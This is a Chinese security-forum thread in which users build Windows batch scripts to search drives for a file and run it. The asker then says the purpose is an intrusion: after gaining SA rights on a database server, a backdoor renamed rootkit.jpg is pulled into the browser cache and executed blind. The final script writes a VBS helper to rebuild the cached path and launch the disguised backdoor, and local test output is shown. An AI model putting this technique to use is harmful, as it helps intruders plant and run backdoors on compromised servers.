议题作者：taiwansee
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

在cmd下找文件是很容易的，如我找c盘下的abc.abc这个文件，只要输入：dir abc.abc /s
就可以了，可是我想要的功能是，让它能实现搜索出并执行所找出来的文件，我不知道
用一个批处理程序能否实现，因为我的知识只有这么点，实在是不知道该怎么实现，望大大们帮帮忙

这个确实简单，估计是冰血今天有高兴的事情才给你弄过来 。
搜索并实现执行，如果这个就是目标的话，很简单的

举例，比如要搜索并执行1.exe

复制内容到剪贴板

代码:

dir c:\1.exe /a/b/s >>c:\jz.bat
dir d:\1.exe /a/b/s >>c:\jz.bat
dir e:\1.exe /a/b/s >>c:\jz.bat
dir f:\1.exe /a/b/s >>c:\jz.bat
jz.bat

把上面代码记事本保存为1.bat. 放在 c根目录
然后运行，如果你有1.exe的话就会被执行。
这应该是最简单的了吧。就不深加工了。

因为你的要求 cmd下搜索并执行程序 好像实现了。

金州~！  你的代码我看了一 下~！发先个问题~！
就是你代码的最后一 句~！我想在没什么特殊情况下还是不要加的好~！~！假如我的4个盘里不同地方有100个1.exe那怎么办？？？按你的写发在找到的情况下都的运行~！那是不是机器就挂了`！
哈哈~！本人一点拙见~！不知道对不的~！请指教~！

@echo off
dir c:\%1 /a/b/s >>c:\jz.bat
dir d:\%1 /a/b/s >>c:\jz.bat
dir e:\%1 /a/b/s >>c:\jz.bat
dir f:\%1 /a/b/s >>c:\jz.bat
jz.bat

将上面的代码保存成*.bat(如a.bat),然后执行a.bat 文件名,
就可以将以文件名命名的文件找出来放在jz.bat中,当然最后的那句jz.bat可以删除了

菜菜的小鸟，深深地感动。
说实话，以前我在别的论坛上发菜鸟问题，都没有高人理睬，扫兴的很。还以为所有的这些高手都
很拽，没想到在你们论坛发问就立即有高手指点，真是让我在迷茫中看到了曙光，好感动！
更知道了什么叫真正的技术论坛（从你们的论坛规则中可以看出）

回到我提的问题上来，看了金州的回复，我马上试了下，发现：

如果所找的文件（如1.exe）在不含有空格的路径里（就是如：c:\windows\  、c:\perl\）
是可以成功的！谢谢了！

但是如果文件在含有空格的路径里（就是如：c:\Documents and Settings\ ）是不能成功的，只能把路径写到jz.bat的文件，而不能成功执行。

我知道，要想用个 批处理文件 执行 指定路径的程序 ，如果路径中含有空格，必须用""修改，如：
我要执行c:\Documents and Settings\1.exe
就应该写成：

c:\"documents and settings"\1.exe

不知道能否用一个批处理程序来解决我的这个问题，先谢谢了！

再说说我的这个问题的由来：

在入侵中我碰到的问题是  web服务器和数据库服务器不在同一台主机上，
我获得了数据库主机的SA权限， 我又知道数据库服务器主机可以浏览网页，我想用HTTP缓存的办法
来远程下载我的后门如：http://www.myweb.com/rootkit.jpg ，借此控制数据库服务器主机，

然后用dir 命令搜索rootkit[1].jpg
再在cmd下执行rootkit[1].jpg
因为我的rookit.jpg是改了后缀名的.exe程序，所以在cmd下运行rootkig[1].jpg还是可以成功的
问题是我的注入工具（NBSI2.5）总是没有回显，不知道返回的信息
逼我用别的办法来实现自动寻找文件并执行程序。
我就想到了用批处理文件。

"c:\documents and settings\"
也可以这样
就是在路径的前后加上引号
这样就不用判断目录是否有空格了

首先，谢谢各位回复我的朋友。

经过各位大大们的指点和测试过程中的N次失败后，我终于实现了自己设想的功能！

拿出来和大家共享，更是希望大大们能给出个更好更简洁的批处理文件

我的批处理内容如下：（我找并执行bbvv[1].jpg这个文件）

echo ^">t.txt
echo on error resume next>>change.vbs
echo Set fso=CreateObject("Scripting.FileSystemObject")>>change.vbs
echo Set a=fso.openTextFile(Wscript.Arguments(0))>>change.vbs
echo str=a.readall>>change.vbs
echo str=replace(str,vbcrlf,"")>>change.vbs
echo Set a=fso.CreateTextFile(Wscript.Arguments(1),Ture)>>change.vbs
echo a.Write(str)>>change.vbs
dir c:\bbvv[1].jpg /a/b/s>test.txt
copy t.txt + test.txt r1.txt
change.vbs r1.txt r2.txt
copy r2.txt r2.bat
r2.bat

上面的代码保存为protest.bat然后在CMD下执行它，在本地测试,返回的结果如下：

D:\>protest.bat

D:\>echo " 1>t.txt

D:\>echo on error resume next 1>>change.vbs

D:\>echo Set fso=CreateObject("Scripting.FileSystemObject") 1>>change.vbs

D:\>echo Set a=fso.openTextFile(Wscript.Arguments(0)) 1>>change.vbs

D:\>echo str=a.readall 1>>change.vbs

D:\>echo str=replace(str,vbcrlf,"") 1>>change.vbs

D:\>echo Set a=fso.CreateTextFile(Wscript.Arguments(1),Ture) 1>>change.vbs

D:\>echo a.Write(str) 1>>change.vbs

D:\>dir c:\bbvv[1].jpg /a/b/s 1>test.txt

D:\>copy t.txt + test.txt r1.txt
t.txt
test.txt
已复制      1 个文件。

D:\>change.vbs r1.txt r2.txt

D:\>copy r2.txt r2.bat
已复制      1 个文件。

D:\>r2.bat

D:\>"c:\Documents and Settings\usert\Local Settings\Temporary Internet Files\C
ontent.IE5\1UGHIAL8\bbvv[1].jpg  

/*这里我要说明下，代码罐头说“在路径的前后加上引号”（如："c:\documents and settings\"），我发现只要在路径的最前端加上一个 " 也能成功，
也就是：

"c:\Documents and Settings\usert\Local Settings\Temporary Internet Files\C
ontent.IE5\1UGHIAL8\bbvv[1].jpg

*/

D:\>

/*
bbvv[1].jpg成功执行了！谢谢各位大大们的帮助，没有你们的指点我一个人解决不了问题
谢谢了！
*/

引用:

这里是引用第[2 楼]的花刺于2006-03-23 10:45发表的： 金州~！ 你的代码我看了一 下~！发先个问题~！就是你代码的最后一 句~！我想在没什么特殊情况下还是不要加的好~！~！假如我的4个盘里不同地方有100个1.exe那怎么办？？？按你的写发在找到的情况下都的运行~！那是不是机器就挂了`！哈哈~！本人一点拙见~！不知道对不的~！请指教~！

1.exe 只是一个例子，不加最后一句，如何执行阿。前面的只是搜索阿
哈哈，谁也不会搜索这个名字吧，
命令行下搜索运行这种东西一般对c就可以了把，本机谁会这么麻烦阿
不过bat这种东西确实意思不大。没有前途。

我在2003上用"/S"参数可以成功找到如document and setting目录里的文件呀

C:\>dir /a/b/s index.htm
C:\Documents and Settings\Administrator\My Documents\index.htm
C:\Program Files\Globallink\Game\share\Advert\100\index.htm
C:\Program Files\Globallink\Game\share\Advert\912\index.htm
C:\WINDOWS\PCHEALTH\HELPCTR\System\blurbs\Index.htm
C:\WINDOWS\PCHEALTH\HELPCTR\System\panels\subpanels\Index.htm

C:\>